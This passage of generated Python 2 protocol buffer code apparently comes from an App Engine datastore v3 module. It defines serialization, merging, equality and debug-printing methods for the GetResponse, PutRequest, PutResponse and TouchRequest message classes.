    n += 1 * len(self.deferred_)
    for i in xrange(len(self.deferred_)): n += self.lengthString(self.deferred_[i].ByteSizePartial())
    if (self.has_in_order_): n += 2
    return n

  def Clear(self):
    self.clear_entity()
    self.clear_deferred()
    self.clear_in_order()

  def OutputUnchecked(self, out):
    for i in xrange(len(self.entity_)):
      out.putVarInt32(11)
      self.entity_[i].OutputUnchecked(out)
      out.putVarInt32(12)
    for i in xrange(len(self.deferred_)):
      out.putVarInt32(42)
      out.putVarInt32(self.deferred_[i].ByteSize())
      self.deferred_[i].OutputUnchecked(out)
    if (self.has_in_order_):
      out.putVarInt32(48)
      out.putBoolean(self.in_order_)

  def OutputPartial(self, out):
    for i in xrange(len(self.entity_)):
      out.putVarInt32(11)
      self.entity_[i].OutputPartial(out)
      out.putVarInt32(12)
    for i in xrange(len(self.deferred_)):
      out.putVarInt32(42)
      out.putVarInt32(self.deferred_[i].ByteSizePartial())
      self.deferred_[i].OutputPartial(out)
    if (self.has_in_order_):
      out.putVarInt32(48)
      out.putBoolean(self.in_order_)

  def TryMerge(self, d):
    while d.avail() > 0:
      tt = d.getVarInt32()
      if tt == 11:
        self.add_entity().TryMerge(d)
        continue
      if tt == 42:
        length = d.getVarInt32()
        tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
        d.skip(length)
        self.add_deferred().TryMerge(tmp)
        continue
      if tt == 48:
        self.set_in_order(d.getBoolean())
        continue


      if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
      d.skipData(tt)


  def __str__(self, prefix="", printElemNumber=0):
    res=""
    cnt=0
    for e in self.entity_:
      elm=""
      if printElemNumber: elm="(%d)" % cnt
      res+=prefix+("Entity%s {\n" % elm)
      res+=e.__str__(prefix + "  ", printElemNumber)
      res+=prefix+"}\n"
      cnt+=1
    cnt=0
    for e in self.deferred_:
      elm=""
      if printElemNumber: elm="(%d)" % cnt
      res+=prefix+("deferred%s <\n" % elm)
      res+=e.__str__(prefix + "  ", printElemNumber)
      res+=prefix+">\n"
      cnt+=1
    if self.has_in_order_: res+=prefix+("in_order: %s\n" % self.DebugFormatBool(self.in_order_))
    return res


  def _BuildTagLookupTable(sparse, maxtag, default=None):
    return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])

  kEntityGroup = 1
  kEntityentity = 2
  kEntitykey = 4
  kEntityversion = 3
  kdeferred = 5
  kin_order = 6

  _TEXT = _BuildTagLookupTable({
    0: "ErrorCode",
    1: "Entity",
    2: "entity",
    3: "version",
    4: "key",
    5: "deferred",
    6: "in_order",
  }, 6)

  _TYPES = _BuildTagLookupTable({
    0: ProtocolBuffer.Encoder.NUMERIC,
    1: ProtocolBuffer.Encoder.STARTGROUP,
    2: ProtocolBuffer.Encoder.STRING,
    3: ProtocolBuffer.Encoder.NUMERIC,
    4: ProtocolBuffer.Encoder.STRING,
    5: ProtocolBuffer.Encoder.STRING,
    6: ProtocolBuffer.Encoder.NUMERIC,
  }, 6, ProtocolBuffer.Encoder.MAX_TYPE)


  _STYLE = """"""
  _STYLE_CONTENT_TYPE = """"""
  _PROTO_DESCRIPTOR_NAME = 'apphosting_datastore_v3.GetResponse'
class PutRequest(ProtocolBuffer.ProtocolMessage):


  CURRENT      =    0
  SEQUENTIAL   =    1

  _AutoIdPolicy_NAMES = {
    0: "CURRENT",
    1: "SEQUENTIAL",
  }

  def AutoIdPolicy_Name(cls, x): return cls._AutoIdPolicy_NAMES.get(x, "")
  AutoIdPolicy_Name = classmethod(AutoIdPolicy_Name)

  has_header_ = 0
  header_ = None
  has_transaction_ = 0
  transaction_ = None
  has_trusted_ = 0
  trusted_ = 0
  has_force_ = 0
  force_ = 0
  has_mark_changes_ = 0
  mark_changes_ = 0
  has_auto_id_policy_ = 0
  auto_id_policy_ = 0

  def __init__(self, contents=None):
    self.entity_ = []
    self.composite_index_ = []
    self.snapshot_ = []
    self.lazy_init_lock_ = thread.allocate_lock()
    if contents is not None: self.MergeFromString(contents)

  def header(self):
    if self.header_ is None:
      self.lazy_init_lock_.acquire()
      try:
        if self.header_ is None: self.header_ = InternalHeader()
      finally:
        self.lazy_init_lock_.release()
    return self.header_

  def mutable_header(self): self.has_header_ = 1; return self.header()

  def clear_header(self):

    if self.has_header_:
      self.has_header_ = 0;
      if self.header_ is not None: self.header_.Clear()

  def has_header(self): return self.has_header_

  def entity_size(self): return len(self.entity_)
  def entity_list(self): return self.entity_

  def entity(self, i):
    return self.entity_[i]

  def mutable_entity(self, i):
    return self.entity_[i]

  def add_entity(self):
    x = EntityProto()
    self.entity_.append(x)
    return x

  def clear_entity(self):
    self.entity_ = []
  def transaction(self):
    if self.transaction_ is None:
      self.lazy_init_lock_.acquire()
      try:
        if self.transaction_ is None: self.transaction_ = Transaction()
      finally:
        self.lazy_init_lock_.release()
    return self.transaction_

  def mutable_transaction(self): self.has_transaction_ = 1; return self.transaction()

  def clear_transaction(self):

    if self.has_transaction_:
      self.has_transaction_ = 0;
      if self.transaction_ is not None: self.transaction_.Clear()

  def has_transaction(self): return self.has_transaction_

  def composite_index_size(self): return len(self.composite_index_)
  def composite_index_list(self): return self.composite_index_

  def composite_index(self, i):
    return self.composite_index_[i]

  def mutable_composite_index(self, i):
    return self.composite_index_[i]

  def add_composite_index(self):
    x = CompositeIndex()
    self.composite_index_.append(x)
    return x

  def clear_composite_index(self):
    self.composite_index_ = []
  def trusted(self): return self.trusted_

  def set_trusted(self, x):
    self.has_trusted_ = 1
    self.trusted_ = x

  def clear_trusted(self):
    if self.has_trusted_:
      self.has_trusted_ = 0
      self.trusted_ = 0

  def has_trusted(self): return self.has_trusted_

  def force(self): return self.force_

  def set_force(self, x):
    self.has_force_ = 1
    self.force_ = x

  def clear_force(self):
    if self.has_force_:
      self.has_force_ = 0
      self.force_ = 0

  def has_force(self): return self.has_force_

  def mark_changes(self): return self.mark_changes_

  def set_mark_changes(self, x):
    self.has_mark_changes_ = 1
    self.mark_changes_ = x

  def clear_mark_changes(self):
    if self.has_mark_changes_:
      self.has_mark_changes_ = 0
      self.mark_changes_ = 0

  def has_mark_changes(self): return self.has_mark_changes_

  def snapshot_size(self): return len(self.snapshot_)
  def snapshot_list(self): return self.snapshot_

  def snapshot(self, i):
    return self.snapshot_[i]

  def mutable_snapshot(self, i):
    return self.snapshot_[i]

  def add_snapshot(self):
    x = Snapshot()
    self.snapshot_.append(x)
    return x

  def clear_snapshot(self):
    self.snapshot_ = []
  def auto_id_policy(self): return self.auto_id_policy_

  def set_auto_id_policy(self, x):
    self.has_auto_id_policy_ = 1
    self.auto_id_policy_ = x

  def clear_auto_id_policy(self):
    if self.has_auto_id_policy_:
      self.has_auto_id_policy_ = 0
      self.auto_id_policy_ = 0

  def has_auto_id_policy(self): return self.has_auto_id_policy_


  def MergeFrom(self, x):
    assert x is not self
    if (x.has_header()): self.mutable_header().MergeFrom(x.header())
    for i in xrange(x.entity_size()): self.add_entity().CopyFrom(x.entity(i))
    if (x.has_transaction()): self.mutable_transaction().MergeFrom(x.transaction())
    for i in xrange(x.composite_index_size()): self.add_composite_index().CopyFrom(x.composite_index(i))
    if (x.has_trusted()): self.set_trusted(x.trusted())
    if (x.has_force()): self.set_force(x.force())
    if (x.has_mark_changes()): self.set_mark_changes(x.mark_changes())
    for i in xrange(x.snapshot_size()): self.add_snapshot().CopyFrom(x.snapshot(i))
    if (x.has_auto_id_policy()): self.set_auto_id_policy(x.auto_id_policy())

  def Equals(self, x):
    if x is self: return 1
    if self.has_header_ != x.has_header_: return 0
    if self.has_header_ and self.header_ != x.header_: return 0
    if len(self.entity_) != len(x.entity_): return 0
    for e1, e2 in zip(self.entity_, x.entity_):
      if e1 != e2: return 0
    if self.has_transaction_ != x.has_transaction_: return 0
    if self.has_transaction_ and self.transaction_ != x.transaction_: return 0
    if len(self.composite_index_) != len(x.composite_index_): return 0
    for e1, e2 in zip(self.composite_index_, x.composite_index_):
      if e1 != e2: return 0
    if self.has_trusted_ != x.has_trusted_: return 0
    if self.has_trusted_ and self.trusted_ != x.trusted_: return 0
    if self.has_force_ != x.has_force_: return 0
    if self.has_force_ and self.force_ != x.force_: return 0
    if self.has_mark_changes_ != x.has_mark_changes_: return 0
    if self.has_mark_changes_ and self.mark_changes_ != x.mark_changes_: return 0
    if len(self.snapshot_) != len(x.snapshot_): return 0
    for e1, e2 in zip(self.snapshot_, x.snapshot_):
      if e1 != e2: return 0
    if self.has_auto_id_policy_ != x.has_auto_id_policy_: return 0
    if self.has_auto_id_policy_ and self.auto_id_policy_ != x.auto_id_policy_: return 0
    return 1

  def IsInitialized(self, debug_strs=None):
    initialized = 1
    if (self.has_header_ and not self.header_.IsInitialized(debug_strs)): initialized = 0
    for p in self.entity_:
      if not p.IsInitialized(debug_strs): initialized=0
    if (self.has_transaction_ and not self.transaction_.IsInitialized(debug_strs)): initialized = 0
    for p in self.composite_index_:
      if not p.IsInitialized(debug_strs): initialized=0
    for p in self.snapshot_:
      if not p.IsInitialized(debug_strs): initialized=0
    return initialized

  def ByteSize(self):
    n = 0
    if (self.has_header_): n += 1 + self.lengthString(self.header_.ByteSize())
    n += 1 * len(self.entity_)
    for i in xrange(len(self.entity_)): n += self.lengthString(self.entity_[i].ByteSize())
    if (self.has_transaction_): n += 1 + self.lengthString(self.transaction_.ByteSize())
    n += 1 * len(self.composite_index_)
    for i in xrange(len(self.composite_index_)): n += self.lengthString(self.composite_index_[i].ByteSize())
    if (self.has_trusted_): n += 2
    if (self.has_force_): n += 2
    if (self.has_mark_changes_): n += 2
    n += 1 * len(self.snapshot_)
    for i in xrange(len(self.snapshot_)): n += self.lengthString(self.snapshot_[i].ByteSize())
    if (self.has_auto_id_policy_): n += 1 + self.lengthVarInt64(self.auto_id_policy_)
    return n

  def ByteSizePartial(self):
    n = 0
    if (self.has_header_): n += 1 + self.lengthString(self.header_.ByteSizePartial())
    n += 1 * len(self.entity_)
    for i in xrange(len(self.entity_)): n += self.lengthString(self.entity_[i].ByteSizePartial())
    if (self.has_transaction_): n += 1 + self.lengthString(self.transaction_.ByteSizePartial())
    n += 1 * len(self.composite_index_)
    for i in xrange(len(self.composite_index_)): n += self.lengthString(self.composite_index_[i].ByteSizePartial())
    if (self.has_trusted_): n += 2
    if (self.has_force_): n += 2
    if (self.has_mark_changes_): n += 2
    n += 1 * len(self.snapshot_)
    for i in xrange(len(self.snapshot_)): n += self.lengthString(self.snapshot_[i].ByteSizePartial())
    if (self.has_auto_id_policy_): n += 1 + self.lengthVarInt64(self.auto_id_policy_)
    return n

  def Clear(self):
    self.clear_header()
    self.clear_entity()
    self.clear_transaction()
    self.clear_composite_index()
    self.clear_trusted()
    self.clear_force()
    self.clear_mark_changes()
    self.clear_snapshot()
    self.clear_auto_id_policy()

  def OutputUnchecked(self, out):
    for i in xrange(len(self.entity_)):
      out.putVarInt32(10)
      out.putVarInt32(self.entity_[i].ByteSize())
      self.entity_[i].OutputUnchecked(out)
    if (self.has_transaction_):
      out.putVarInt32(18)
      out.putVarInt32(self.transaction_.ByteSize())
      self.transaction_.OutputUnchecked(out)
    for i in xrange(len(self.composite_index_)):
      out.putVarInt32(26)
      out.putVarInt32(self.composite_index_[i].ByteSize())
      self.composite_index_[i].OutputUnchecked(out)
    if (self.has_trusted_):
      out.putVarInt32(32)
      out.putBoolean(self.trusted_)
    if (self.has_force_):
      out.putVarInt32(56)
      out.putBoolean(self.force_)
    if (self.has_mark_changes_):
      out.putVarInt32(64)
      out.putBoolean(self.mark_changes_)
    for i in xrange(len(self.snapshot_)):
      out.putVarInt32(74)
      out.putVarInt32(self.snapshot_[i].ByteSize())
      self.snapshot_[i].OutputUnchecked(out)
    if (self.has_auto_id_policy_):
      out.putVarInt32(80)
      out.putVarInt32(self.auto_id_policy_)
    if (self.has_header_):
      out.putVarInt32(90)
      out.putVarInt32(self.header_.ByteSize())
      self.header_.OutputUnchecked(out)

  def OutputPartial(self, out):
    for i in xrange(len(self.entity_)):
      out.putVarInt32(10)
      out.putVarInt32(self.entity_[i].ByteSizePartial())
      self.entity_[i].OutputPartial(out)
    if (self.has_transaction_):
      out.putVarInt32(18)
      out.putVarInt32(self.transaction_.ByteSizePartial())
      self.transaction_.OutputPartial(out)
    for i in xrange(len(self.composite_index_)):
      out.putVarInt32(26)
      out.putVarInt32(self.composite_index_[i].ByteSizePartial())
      self.composite_index_[i].OutputPartial(out)
    if (self.has_trusted_):
      out.putVarInt32(32)
      out.putBoolean(self.trusted_)
    if (self.has_force_):
      out.putVarInt32(56)
      out.putBoolean(self.force_)
    if (self.has_mark_changes_):
      out.putVarInt32(64)
      out.putBoolean(self.mark_changes_)
    for i in xrange(len(self.snapshot_)):
      out.putVarInt32(74)
      out.putVarInt32(self.snapshot_[i].ByteSizePartial())
      self.snapshot_[i].OutputPartial(out)
    if (self.has_auto_id_policy_):
      out.putVarInt32(80)
      out.putVarInt32(self.auto_id_policy_)
    if (self.has_header_):
      out.putVarInt32(90)
      out.putVarInt32(self.header_.ByteSizePartial())
      self.header_.OutputPartial(out)

  def TryMerge(self, d):
    while d.avail() > 0:
      tt = d.getVarInt32()
      if tt == 10:
        length = d.getVarInt32()
        tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
        d.skip(length)
        self.add_entity().TryMerge(tmp)
        continue
      if tt == 18:
        length = d.getVarInt32()
        tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
        d.skip(length)
        self.mutable_transaction().TryMerge(tmp)
        continue
      if tt == 26:
        length = d.getVarInt32()
        tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
        d.skip(length)
        self.add_composite_index().TryMerge(tmp)
        continue
      if tt == 32:
        self.set_trusted(d.getBoolean())
        continue
      if tt == 56:
        self.set_force(d.getBoolean())
        continue
      if tt == 64:
        self.set_mark_changes(d.getBoolean())
        continue
      if tt == 74:
        length = d.getVarInt32()
        tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
        d.skip(length)
        self.add_snapshot().TryMerge(tmp)
        continue
      if tt == 80:
        self.set_auto_id_policy(d.getVarInt32())
        continue
      if tt == 90:
        length = d.getVarInt32()
        tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
        d.skip(length)
        self.mutable_header().TryMerge(tmp)
        continue


      if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
      d.skipData(tt)


  def __str__(self, prefix="", printElemNumber=0):
    res=""
    if self.has_header_:
      res+=prefix+"header <\n"
      res+=self.header_.__str__(prefix + "  ", printElemNumber)
      res+=prefix+">\n"
    cnt=0
    for e in self.entity_:
      elm=""
      if printElemNumber: elm="(%d)" % cnt
      res+=prefix+("entity%s <\n" % elm)
      res+=e.__str__(prefix + "  ", printElemNumber)
      res+=prefix+">\n"
      cnt+=1
    if self.has_transaction_:
      res+=prefix+"transaction <\n"
      res+=self.transaction_.__str__(prefix + "  ", printElemNumber)
      res+=prefix+">\n"
    cnt=0
    for e in self.composite_index_:
      elm=""
      if printElemNumber: elm="(%d)" % cnt
      res+=prefix+("composite_index%s <\n" % elm)
      res+=e.__str__(prefix + "  ", printElemNumber)
      res+=prefix+">\n"
      cnt+=1
    if self.has_trusted_: res+=prefix+("trusted: %s\n" % self.DebugFormatBool(self.trusted_))
    if self.has_force_: res+=prefix+("force: %s\n" % self.DebugFormatBool(self.force_))
    if self.has_mark_changes_: res+=prefix+("mark_changes: %s\n" % self.DebugFormatBool(self.mark_changes_))
    cnt=0
    for e in self.snapshot_:
      elm=""
      if printElemNumber: elm="(%d)" % cnt
      res+=prefix+("snapshot%s <\n" % elm)
      res+=e.__str__(prefix + "  ", printElemNumber)
      res+=prefix+">\n"
      cnt+=1
    if self.has_auto_id_policy_: res+=prefix+("auto_id_policy: %s\n" % self.DebugFormatInt32(self.auto_id_policy_))
    return res


  def _BuildTagLookupTable(sparse, maxtag, default=None):
    return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])

  kheader = 11
  kentity = 1
  ktransaction = 2
  kcomposite_index = 3
  ktrusted = 4
  kforce = 7
  kmark_changes = 8
  ksnapshot = 9
  kauto_id_policy = 10

  _TEXT = _BuildTagLookupTable({
    0: "ErrorCode",
    1: "entity",
    2: "transaction",
    3: "composite_index",
    4: "trusted",
    7: "force",
    8: "mark_changes",
    9: "snapshot",
    10: "auto_id_policy",
    11: "header",
  }, 11)

  _TYPES = _BuildTagLookupTable({
    0: ProtocolBuffer.Encoder.NUMERIC,
    1: ProtocolBuffer.Encoder.STRING,
    2: ProtocolBuffer.Encoder.STRING,
    3: ProtocolBuffer.Encoder.STRING,
    4: ProtocolBuffer.Encoder.NUMERIC,
    7: ProtocolBuffer.Encoder.NUMERIC,
    8: ProtocolBuffer.Encoder.NUMERIC,
    9: ProtocolBuffer.Encoder.STRING,
    10: ProtocolBuffer.Encoder.NUMERIC,
    11: ProtocolBuffer.Encoder.STRING,
  }, 11, ProtocolBuffer.Encoder.MAX_TYPE)


  _STYLE = """"""
  _STYLE_CONTENT_TYPE = """"""
  _PROTO_DESCRIPTOR_NAME = 'apphosting_datastore_v3.PutRequest'
class PutResponse(ProtocolBuffer.ProtocolMessage):
  has_cost_ = 0
  cost_ = None

  def __init__(self, contents=None):
    self.key_ = []
    self.version_ = []
    self.lazy_init_lock_ = thread.allocate_lock()
    if contents is not None: self.MergeFromString(contents)

  def key_size(self): return len(self.key_)
  def key_list(self): return self.key_

  def key(self, i):
    return self.key_[i]

  def mutable_key(self, i):
    return self.key_[i]

  def add_key(self):
    x = Reference()
    self.key_.append(x)
    return x

  def clear_key(self):
    self.key_ = []
  def cost(self):
    if self.cost_ is None:
      self.lazy_init_lock_.acquire()
      try:
        if self.cost_ is None: self.cost_ = Cost()
      finally:
        self.lazy_init_lock_.release()
    return self.cost_

  def mutable_cost(self): self.has_cost_ = 1; return self.cost()

  def clear_cost(self):

    if self.has_cost_:
      self.has_cost_ = 0;
      if self.cost_ is not None: self.cost_.Clear()

  def has_cost(self): return self.has_cost_

  def version_size(self): return len(self.version_)
  def version_list(self): return self.version_

  def version(self, i):
    return self.version_[i]

  def set_version(self, i, x):
    self.version_[i] = x

  def add_version(self, x):
    self.version_.append(x)

  def clear_version(self):
    self.version_ = []


  def MergeFrom(self, x):
    assert x is not self
    for i in xrange(x.key_size()): self.add_key().CopyFrom(x.key(i))
    if (x.has_cost()): self.mutable_cost().MergeFrom(x.cost())
    for i in xrange(x.version_size()): self.add_version(x.version(i))

  def Equals(self, x):
    if x is self: return 1
    if len(self.key_) != len(x.key_): return 0
    for e1, e2 in zip(self.key_, x.key_):
      if e1 != e2: return 0
    if self.has_cost_ != x.has_cost_: return 0
    if self.has_cost_ and self.cost_ != x.cost_: return 0
    if len(self.version_) != len(x.version_): return 0
    for e1, e2 in zip(self.version_, x.version_):
      if e1 != e2: return 0
    return 1

  def IsInitialized(self, debug_strs=None):
    initialized = 1
    for p in self.key_:
      if not p.IsInitialized(debug_strs): initialized=0
    if (self.has_cost_ and not self.cost_.IsInitialized(debug_strs)): initialized = 0
    return initialized

  def ByteSize(self):
    n = 0
    n += 1 * len(self.key_)
    for i in xrange(len(self.key_)): n += self.lengthString(self.key_[i].ByteSize())
    if (self.has_cost_): n += 1 + self.lengthString(self.cost_.ByteSize())
    n += 1 * len(self.version_)
    for i in xrange(len(self.version_)): n += self.lengthVarInt64(self.version_[i])
    return n

  def ByteSizePartial(self):
    n = 0
    n += 1 * len(self.key_)
    for i in xrange(len(self.key_)): n += self.lengthString(self.key_[i].ByteSizePartial())
    if (self.has_cost_): n += 1 + self.lengthString(self.cost_.ByteSizePartial())
    n += 1 * len(self.version_)
    for i in xrange(len(self.version_)): n += self.lengthVarInt64(self.version_[i])
    return n

  def Clear(self):
    self.clear_key()
    self.clear_cost()
    self.clear_version()

  def OutputUnchecked(self, out):
    for i in xrange(len(self.key_)):
      out.putVarInt32(10)
      out.putVarInt32(self.key_[i].ByteSize())
      self.key_[i].OutputUnchecked(out)
    if (self.has_cost_):
      out.putVarInt32(18)
      out.putVarInt32(self.cost_.ByteSize())
      self.cost_.OutputUnchecked(out)
    for i in xrange(len(self.version_)):
      out.putVarInt32(24)
      out.putVarInt64(self.version_[i])

  def OutputPartial(self, out):
    for i in xrange(len(self.key_)):
      out.putVarInt32(10)
      out.putVarInt32(self.key_[i].ByteSizePartial())
      self.key_[i].OutputPartial(out)
    if (self.has_cost_):
      out.putVarInt32(18)
      out.putVarInt32(self.cost_.ByteSizePartial())
      self.cost_.OutputPartial(out)
    for i in xrange(len(self.version_)):
      out.putVarInt32(24)
      out.putVarInt64(self.version_[i])

  def TryMerge(self, d):
    while d.avail() > 0:
      tt = d.getVarInt32()
      if tt == 10:
        length = d.getVarInt32()
        tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
        d.skip(length)
        self.add_key().TryMerge(tmp)
        continue
      if tt == 18:
        length = d.getVarInt32()
        tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
        d.skip(length)
        self.mutable_cost().TryMerge(tmp)
        continue
      if tt == 24:
        self.add_version(d.getVarInt64())
        continue


      if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
      d.skipData(tt)


  def __str__(self, prefix="", printElemNumber=0):
    res=""
    cnt=0
    for e in self.key_:
      elm=""
      if printElemNumber: elm="(%d)" % cnt
      res+=prefix+("key%s <\n" % elm)
      res+=e.__str__(prefix + "  ", printElemNumber)
      res+=prefix+">\n"
      cnt+=1
    if self.has_cost_:
      res+=prefix+"cost <\n"
      res+=self.cost_.__str__(prefix + "  ", printElemNumber)
      res+=prefix+">\n"
    cnt=0
    for e in self.version_:
      elm=""
      if printElemNumber: elm="(%d)" % cnt
      res+=prefix+("version%s: %s\n" % (elm, self.DebugFormatInt64(e)))
      cnt+=1
    return res


  def _BuildTagLookupTable(sparse, maxtag, default=None):
    return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])

  kkey = 1
  kcost = 2
  kversion = 3

  _TEXT = _BuildTagLookupTable({
    0: "ErrorCode",
    1: "key",
    2: "cost",
    3: "version",
  }, 3)

  _TYPES = _BuildTagLookupTable({
    0: ProtocolBuffer.Encoder.NUMERIC,
    1: ProtocolBuffer.Encoder.STRING,
    2: ProtocolBuffer.Encoder.STRING,
    3: ProtocolBuffer.Encoder.NUMERIC,
  }, 3, ProtocolBuffer.Encoder.MAX_TYPE)


  _STYLE = """"""
  _STYLE_CONTENT_TYPE = """"""
  _PROTO_DESCRIPTOR_NAME = 'apphosting_datastore_v3.PutResponse'
class TouchRequest(ProtocolBuffer.ProtocolMessage):
  has_header_ = 0
  header_ = None
  has_force_ = 0
  force_ = 0

  def __init__(self, contents=None):
    self.key_ = []
    self.composite_index_ = []
    self.snapshot_ = []
    self.lazy_init_lock_ = thread.allocate_lock()
    if contents is not None: self.MergeFromString(contents)

  def header(self):
    if self.header_ is None:
      self.lazy_init_lock_.acquire()
      try:
        if self.header_ is None: self.header_ = InternalHeader()
      finally:
        self.lazy_init_lock_.release()
    return self.header_

  def mutable_header(self): self.has_header_ = 1; return self.header()

  def clear_header(self):

    if self.has_header_:
      self.has_header_ = 0;
      if self.header_ is not None: self.header_.Clear()

  def has_header(self): return self.has_header_

  def key_size(self): return len(self.key_)
  def key_list(self): return self.key_

  def key(self, i):
    return self.key_[i]

  def mutable_key(self, i):
    return self.key_[i]

  def add_key(self):
    x = Reference()
    self.key_.append(x)
    return x

  def clear_key(self):
    self.key_ = []
  def composite_index_size(self): return len(self.composite_index_)
  def composite_index_list(self): return self.composite_index_

  def composite_index(self, i):
    return self.composite_index_[i]

  def mutable_composite_index(self, i):
    return self.composite_index_[i]

  def add_composite_index(self):
    x = CompositeIndex()
    self.composite_index_.append(x)
    return x

  def clear_composite_index(self):
    self.composite_index_ = []
  def force(self): return self.force_

  def set_force(self, x):
    self.has_force_ = 1
    self.force_ = x

  def clear_force(self):
    if self.has_force_:
      self.has_force_ = 0
      self.force_ = 0

  def has_force(self): return self.has_force_

  def snapshot_size(self): return len(self.snapshot_)
  def snapshot_list(self): return self.snapshot_

  def snapshot(self, i):
    return self.snapshot_[i]

  def mutable_snapshot(self, i):
    return self.snapshot_[i]

  def add_snapshot(self):
    x = Snapshot()
    self.snapshot_.append(x)
    return x

  def clear_snapshot(self):
    self.snapshot_ = []

  def MergeFrom(self, x):
    assert x is not self
    if (x.has_header()): self.mutable_header().MergeFrom(x.header())
    for i in xrange(x.key_size()): self.add_key().CopyFrom(x.key(i))
    for i in xrange(x.composite_index_size()): self.add_composite_index().CopyFrom(x.composite_index(i))
    if (x.has_force()): self.set_force(x.force())
    for i in xrange(x.snapshot_size()): self.add_snapshot().CopyFrom(x.snapshot(i))

  def Equals(self, x):
    if x is self: return 1
    if self.has_header_ != x.has_header_: return 0
    if self.has_header_ and self.header_ != x.header_: return 0
    if len(self.key_) != len(x.key_): return 0
    for e1, e2 in zip(self.key_, x.key_):
      if e1 != e2: return 0
    if len(self.composite_index_) != len(x.composite_index_): return 0
    for e1, e2 in zip(self.composite_index_, x.composite_index_):
      if e1 != e2: return 0
    if self.has_force_ != x.has_force_: return 0
    if self.has_force_ and self.force_ != x.force_: return 0
    if len(self.snapshot_) != len(x.snapshot_): return 0
    for e1, e2 in zip(self.snapshot_, x.snapshot_):
      if e1 != e2: return 0
    return 1

  def IsInitialized(self, debug_strs=None):
    initialized = 1
    if (self.has_header_ and not self.header_.IsInitialized(debug_strs)): initialized = 0
    for p in self.key_:
      if not p.IsInitialized(debug_strs): initialized=0
    for p in self.composite_index_:
      if not p.IsInitialized(debug_strs): initialized=0
    for p in self.snapshot_:
      if not p.IsInitialized(debug_strs): initialized=0
    return initialized

  def ByteSize(self):
    n = 0
    if (self.has_header_): n += 1 + self.lengthString(self.header_.ByteSize())
    n += 1 * len(self.key_)
    for i in xrange(len(self.key_)): n += self.lengthString(self.key_[i].ByteSize())
    n += 1 * len(self.composite_index_)
    for i in xrange(len(self.composite_index_)): n += self.lengthString(self.composite_index_[i].ByteSize())
    if (self.has_force_): n += 2
    n += 1 * len(self.snapshot_)
    for i in xrange(len(self.snapshot_)): n += self.lengthString(self.snapshot_[i].ByteSize())
    return n

  def ByteSizePartial(self):
    n = 0
    if (self.has_header_): n += 1 + self.lengthString(self.header_.ByteSizePartial())
    n += 1 * len(self.key_)
    for i in xrange(len(self.key_)): n += self.lengthString(self.key_[i].ByteSizePartial())
    n += 1 * len(self.composite_index_)
    for i in xrange(len(self.composite_index_)): n += self.lengthString(self.composite_index_[i].ByteSizePartial())
    if (self.has_force_): n += 2
    n += 1 * len(self.snapshot_)
    for i in xrange(len(self.snapshot_)): n += self.lengthString(self.snapshot_[i].ByteSizePartial())
    return n

  def Clear(self):
    self.clear_header()
    self.clear_key()
    self.clear_composite_index()
    self.clear_force()
    self.clear_snapshot()

  def OutputUnchecked(self, out):
    for i in xrange(len(self.key_)):
      out.putVarInt32(10)
      out.putVarInt32(self.key_[i].ByteSize())
      self.key_[i].OutputUnchecked(out)
    for i in xrange(len(self.composite_index_)):
      out.putVarInt32(18)
      out.putVarInt32(self.composite_index_[i].ByteSize())
      self.composite_index_[i].OutputUnchecked(out)
    if (self.has_force_):
      out.putVarInt32(24)
      out.putBoolean(self.force_)
    for i in xrange(len(self.snapshot_)):
      out.putVarInt32(74)
      out.putVarInt32(self.snapshot_[i].ByteSize())
      self.snapshot_[i].OutputUnchecked(out)
    if (self.has_header_):
      out.putVarInt32(82)
      out.putVarInt32(self.header_.ByteSize())
      self.header_.OutputUnchecked(out)

  def OutputPartial(self, out):
    for i in xrange(len(self.key_)):
      out.putVarInt32(10)
      out.putVarInt32(self.key_[i].ByteSizePartial())
      self.key_[i].OutputPartial(out)
    for i in xrange(len(self.composite_index_)):
      out.putVarInt32(18)
      out.putVarInt32(self.composite_index_[i].ByteSizePartial())
      self.composite_index_[i].OutputPartial(out)
    if (self.has_force_):
      out.putVarInt32(24)
      out.putBoolean(self.force_)
    for i in xrange(len(self.snapshot_)):
      out.putVarInt32(74)
      out.putVarInt32(self.snapshot_[i].ByteSizePartial())
      self.snapshot_[i].OutputPartial(out)
    if (self.has_header_):
      out.putVarInt32(82)
      out.putVarInt32(self.header_.ByteSizePartial())
      self.header_.OutputPartial(out)

  def TryMerge(self, d):
    while d.avail() > 0:
      tt = d.getVarInt32()
      if tt == 10:
        length = d.getVarInt32()
        tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
        d.skip(length)
        self.add_key().TryMerge(tmp)
        continue
      if tt == 18:
        length = d.getVarInt32()
        tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
        d.skip(length)
        self.add_composite_index().TryMerge(tmp)
        continue
      if tt == 24:
        self.set_force(d.getBoolean())
        continue
      if tt == 74:
        length = d.getVarInt32()
        tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
        d.skip(length)
        self.add_snapshot().TryMerge(tmp)
        continue
      if tt == 82:
        length = d.getVarInt32()
        tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
        d.skip(length)
        self.mutable_header().TryMerge(tmp)
        continue


      if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
      d.skipData(tt)


  def __str__(self, prefix="", printElemNumber=0):
    res=""
    if self.has_header_:
      res+=prefix+"header <\n"
      res+=self.header_.__str__(prefix + "  ", printElemNumber)
      res+=prefix+">\n"
    cnt=0
    for e in self.key_:
      elm=""
      if printElemNumber: elm="(%d)" % cnt
      res+=prefix+("key%s <\n" % elm)
      res+=e.__str__(prefix + "  ", printElemNumber)
      res+=prefix+">\n"
